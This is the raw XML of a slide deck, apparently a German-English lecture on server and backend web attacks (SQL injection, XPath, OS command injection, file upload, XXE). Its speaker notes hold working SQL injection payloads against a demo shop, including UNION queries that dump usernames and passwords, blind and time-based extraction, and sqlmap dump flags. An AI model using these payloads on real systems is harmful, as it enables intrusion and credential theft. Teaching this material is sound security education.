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35" r:id="rId3"/>
    <p:sldId id="426" r:id="rId4"/>
    <p:sldId id="339" r:id="rId5"/>
    <p:sldId id="340" r:id="rId6"/>
    <p:sldId id="341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50" r:id="rId17"/>
    <p:sldId id="451" r:id="rId18"/>
    <p:sldId id="447" r:id="rId19"/>
    <p:sldId id="448" r:id="rId20"/>
    <p:sldId id="449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37" r:id="rId37"/>
    <p:sldId id="436" r:id="rId38"/>
    <p:sldId id="435" r:id="rId39"/>
    <p:sldId id="343" r:id="rId40"/>
    <p:sldId id="374" r:id="rId41"/>
    <p:sldId id="434" r:id="rId42"/>
    <p:sldId id="428" r:id="rId43"/>
    <p:sldId id="467" r:id="rId44"/>
    <p:sldId id="468" r:id="rId45"/>
    <p:sldId id="469" r:id="rId46"/>
    <p:sldId id="375" r:id="rId47"/>
    <p:sldId id="376" r:id="rId48"/>
    <p:sldId id="377" r:id="rId49"/>
    <p:sldId id="472" r:id="rId50"/>
    <p:sldId id="471" r:id="rId51"/>
    <p:sldId id="470" r:id="rId52"/>
    <p:sldId id="429" r:id="rId53"/>
    <p:sldId id="378" r:id="rId54"/>
    <p:sldId id="380" r:id="rId55"/>
    <p:sldId id="381" r:id="rId56"/>
    <p:sldId id="382" r:id="rId57"/>
    <p:sldId id="384" r:id="rId58"/>
    <p:sldId id="475" r:id="rId59"/>
    <p:sldId id="474" r:id="rId60"/>
    <p:sldId id="387" r:id="rId61"/>
    <p:sldId id="473" r:id="rId62"/>
    <p:sldId id="430" r:id="rId63"/>
    <p:sldId id="389" r:id="rId64"/>
    <p:sldId id="388" r:id="rId65"/>
    <p:sldId id="391" r:id="rId66"/>
    <p:sldId id="392" r:id="rId67"/>
    <p:sldId id="393" r:id="rId68"/>
    <p:sldId id="479" r:id="rId69"/>
    <p:sldId id="478" r:id="rId70"/>
    <p:sldId id="394" r:id="rId71"/>
    <p:sldId id="411" r:id="rId72"/>
    <p:sldId id="477" r:id="rId73"/>
    <p:sldId id="476" r:id="rId74"/>
    <p:sldId id="431" r:id="rId75"/>
    <p:sldId id="397" r:id="rId76"/>
    <p:sldId id="398" r:id="rId77"/>
    <p:sldId id="399" r:id="rId78"/>
    <p:sldId id="400" r:id="rId79"/>
    <p:sldId id="433" r:id="rId80"/>
    <p:sldId id="483" r:id="rId81"/>
    <p:sldId id="482" r:id="rId82"/>
    <p:sldId id="481" r:id="rId83"/>
    <p:sldId id="480" r:id="rId84"/>
    <p:sldId id="432" r:id="rId85"/>
    <p:sldId id="402" r:id="rId86"/>
    <p:sldId id="338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87" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="1196" y="1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56732ECD-ECFA-4D7D-A167-D02AB58E1D74}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:50:25.599" v="102" actId="1035"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:50:25.599" v="102" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1600761852" sldId="453"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:32:00.129" v="1" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="2" creationId="{AF2E6942-FEA9-4933-BA81-EBA8BE806F0A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:32:03.886" v="4" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="3" creationId="{6F68C340-4F3E-4BD8-9471-DB131BAD0296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5" creationId="{C621DE67-9694-4BF4-9E8A-F80C4E9DF500}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:49:59.960" v="85" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1600761852" sldId="453"/>
            <ac:picMk id="7" creationId="{1285D9BD-8FE2-435F-8152-E999187A7F09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9" creationId="{AA6CCDB4-9C04-428C-9F34-97F0943C6AF0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4:35.321" v="23" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3866130153" sldId="454"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:26.808" v="18" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="2" creationId="{C3C7EACE-0752-456A-AC79-1D4810127009}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:27.336" v="19" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="3" creationId="{D3117732-4B2B-46C2-83D9-3D96B14D86DF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:35.321" v="23" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3866130153" sldId="454"/>
            <ac:picMk id="5" creationId="{EFA4C95E-706F-4FCC-B60E-B30D0AE469DD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5:15.978" v="31" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3380740525" sldId="455"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:34:52.625" v="24" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="2" creationId="{47664FA2-ECFB-4CFD-AD13-C31C9455B04B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:35:15.978" v="31" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3380740525" sldId="455"/>
            <ac:picMk id="4" creationId="{52B58ABE-E159-42A4-A8A7-7893AB39559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6:02.651" v="42" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3681501289" sldId="456"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:35:39.844" v="32" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681501289" sldId="456"/>
            <ac:picMk id="2" creationId="{E70C91B3-5219-4654-B24C-C90BE84B0FFE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:36:02.651" v="42" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3681501289" sldId="456"/>
            <ac:picMk id="4" creationId="{E22088BE-0CD2-4B24-9C96-F426BB6B09C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7:22.293" v="47" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3364176872" sldId="457"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:37:15.108" v="43" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3364176872" sldId="457"/>
            <ac:picMk id="2" creationId="{87EC6B61-2E3B-40EF-9C20-F1F26F68B28C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:37:22.293" v="47" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3364176872" sldId="457"/>
            <ac:picMk id="4" creationId="{71F7046D-0126-4F2C-BB72-5C0E0BA153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16.086" v="52" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="838756640" sldId="458"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:08.604" v="48" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="2" creationId="{9C638A45-08AC-465D-A2D5-F17118F3175E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:16.086" v="52" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="838756640" sldId="458"/>
            <ac:picMk id="4" creationId="{83F742E5-E71B-4789-A9AB-EBC62CB337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51.163" v="59" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1096124257" sldId="459"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:40.377" v="53" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1096124257" sldId="459"/>
            <ac:picMk id="2" creationId="{81A81B13-5517-4721-9F1F-C2AD75ED1FF2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:38:51.163" v="59" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1096124257" sldId="459"/>
            <ac:picMk id="4" creationId="{A4084DAE-D571-4CF8-A090-C26F8D88A98E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0:37.932" v="66" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="781291766" sldId="460"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:40:27.564" v="60" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="4" creationId="{ED53D162-3479-4162-A982-CD9BAEBB1556}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:40:37.932" v="66" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="781291766" sldId="460"/>
            <ac:picMk id="5" creationId="{415DC133-2C31-4FEA-912C-A13351EF86C5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07.511" v="71" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1929560910" sldId="461"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:01.792" v="67" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="3" creationId="{D34F4EEE-76D3-41D8-8C4E-6ADD27DFA430}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:07.511" v="71" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1929560910" sldId="461"/>
            <ac:picMk id="4" creationId="{DD54D02B-EE42-4263-BD8A-4CACDA292399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48.823" v="76" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="973399520" sldId="462"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:41.057" v="72" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="3" creationId="{624D7551-DA34-480B-A4F5-1E68AD55AB37}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:41:48.823" v="76" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="973399520" sldId="462"/>
            <ac:picMk id="4" creationId="{B85D2D3E-7F5C-45CA-8A83-BBC5C590A294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4:10.252" v="84" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3766473943" sldId="463"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:43:53.816" v="77" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="3" creationId="{1EC3401B-D06A-435E-ACD5-364D82349E24}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{56732ECD-ECFA-4D7D-A167-D02AB58E1D74}" dt="2021-02-13T22:44:10.252" v="84" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3766473943" sldId="463"/>
            <ac:picMk id="4" creationId="{35A509A2-51A9-4E71-B083-E0383113A718}"/>
          </ac:picMkLst>
        </pc:pic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2-06T11:14:04.573" v="8083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4T07:36:28.349" v="7919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24T07:36:28.349" v="7919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2-06T11:13:38.880" v="8039" actId="20577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2-06T11:14:04.573" v="8083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1' and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1; Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1' and 1=1 UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, null, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select @@version, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>current_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, null, null, null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select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null, null from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION Select name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, password, null, null from users;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Blind:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://lightside.me/shop/blind.php?id=1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1’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 or 1=1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and 1=2;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION Select @@version;--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1=1;--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true = false;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = true;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'm', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,1) = 'x', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 and true = (SELECT IF(SUBSTRING(uname,1,2) = 'ma', true, false) FROM users LIMIT 1);-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 UNION SELECT IF(SUBSTRING(uname,1,1) = 'm', sleep(5), false) FROM users LIMIT 1;-- -</a:t>
            </a:r>
          </a:p>
          <a:p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--tables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-T users --dump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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lightside.users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5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Einer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in den </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kommentaren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meint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 der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nähe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> war und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geklappt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hat – bin mir da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sicher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> ^^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04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97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08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99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 err="1"/>
              <a:t>path-traversal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haben wir hier auch! (ist aber in dem Fall das geringere Übel)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156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https://portswigger.net/web-security/os-command-injection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85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15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76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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bestehende</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>überschreiben</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, DoS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244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75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184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55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8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802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835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90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309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714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5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2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37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1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13.02.2021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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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5.png"/><Relationship Id="rId4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image" Target="../media/image4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/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, XPath Injection, OS Command Injection, File Upload, XXE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8F5C6FF-0D6C-4369-902D-DA109B4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" y="1755401"/>
            <a:ext cx="11034361" cy="28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62DB1A0-2092-4174-B4F5-9E30A67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3578B4-6FB8-42DC-AA70-C92BBC6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75" y="153601"/>
            <a:ext cx="6996984" cy="26308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50CE82B-C4CC-48D9-8703-07FAA3E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6" y="2900005"/>
            <a:ext cx="7651248" cy="38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5CA995-0593-4154-8ACA-B129286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2032890"/>
            <a:ext cx="11021538" cy="24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CC1772-1E4C-4A8A-9005-45C9A61B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0" y="1511919"/>
            <a:ext cx="10912099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512220-ABFE-4498-9C30-2C13F267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9" y="839361"/>
            <a:ext cx="11143602" cy="5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81E4CE-BAA5-4D25-A7F6-D8B70917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6" y="1545277"/>
            <a:ext cx="10788008" cy="3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3B4B8F-1D2F-4D32-B844-277EAB1A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1668487"/>
            <a:ext cx="10818046" cy="35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1E3ABC-7F70-4AAD-A142-341067E0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79" y="1680233"/>
            <a:ext cx="9502042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560F76-182C-4E06-8C45-6FC2621F4AAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5641178" y="384441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0168B1-494C-46AA-98B4-E99B2C6B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" y="132428"/>
            <a:ext cx="11961678" cy="3761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E3F18E-1677-486F-87E9-08EB5A37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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115161" y="4213745"/>
            <a:ext cx="11961678" cy="23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Server and Backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Attacks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17CFF-7DCC-4915-A783-B7DC2799F26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pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> easy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application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so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>chatty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6503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21DE67-9694-4BF4-9E8A-F80C4E9D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9" y="317683"/>
            <a:ext cx="6509721" cy="29786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6CCDB4-9C04-428C-9F34-97F0943C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79" y="3515626"/>
            <a:ext cx="6535364" cy="29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A4C95E-706F-4FCC-B60E-B30D0AE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1795712"/>
            <a:ext cx="11510074" cy="28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B58ABE-E159-42A4-A8A7-7893AB39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1" y="1400575"/>
            <a:ext cx="10956817" cy="40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2088BE-0CD2-4B24-9C96-F426BB6B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3" y="1389976"/>
            <a:ext cx="10874794" cy="40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F7046D-0126-4F2C-BB72-5C0E0BA1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4" y="1560846"/>
            <a:ext cx="10739992" cy="37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F742E5-E71B-4789-A9AB-EBC62CB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3" y="1564105"/>
            <a:ext cx="10070433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084DAE-D571-4CF8-A090-C26F8D8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71" y="1571975"/>
            <a:ext cx="9945057" cy="37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5D2D3E-7F5C-45CA-8A83-BBC5C590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86401"/>
            <a:ext cx="11825831" cy="2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5A509A2-51A9-4E71-B083-E0383113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2" y="2051472"/>
            <a:ext cx="11901396" cy="27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4CEF31-2FA4-446E-BDE3-16B51000D493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="93956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dbs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AF73FD-F97F-4467-B06E-3588EE26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1495554"/>
            <a:ext cx="3093135" cy="1554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A17791-7925-4C6D-A3FE-D54218C638A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="3647005"/>
            <a:ext cx="1010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--tables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CE8941-6018-4895-ADC5-30A4C0D4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r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669409" y="4134251"/>
            <a:ext cx="2668864" cy="1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2693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64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61784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01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43521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99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1BF9A5-2910-40A4-8A09-83F0318D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2900362" y="441434"/>
            <a:ext cx="6391275" cy="20335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CA0F0E-F318-4650-9966-7732CB58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DFB444-7E27-4F0D-80C3-BFC84D3A0D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="96103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6062D2-C6F2-4A88-BA88-353CE055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60" y="5967452"/>
            <a:ext cx="2181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40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B811F-576E-478C-A2F2-53B1ABB3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3F531-D9BC-4541-B927-79A44E1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else you can do heavily depends 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query you’re injecting into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT, INSERT INTO, UPDATE, DELETE, EXEC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operating system and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dbms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>reading / writing files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MySQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executing OS commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. MS SQL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
